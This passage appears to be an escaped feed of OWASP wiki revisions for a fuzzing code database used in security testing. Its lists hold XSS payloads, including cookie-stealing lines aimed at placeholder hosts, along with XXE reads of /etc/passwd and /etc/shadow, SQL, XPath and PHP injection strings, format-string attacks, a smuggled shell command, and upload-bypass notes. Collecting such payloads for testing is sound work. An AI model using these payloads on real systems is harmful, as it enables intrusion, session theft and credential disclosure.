&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80069</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80069"/>
				<updated>2010-03-17T20:47:21Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
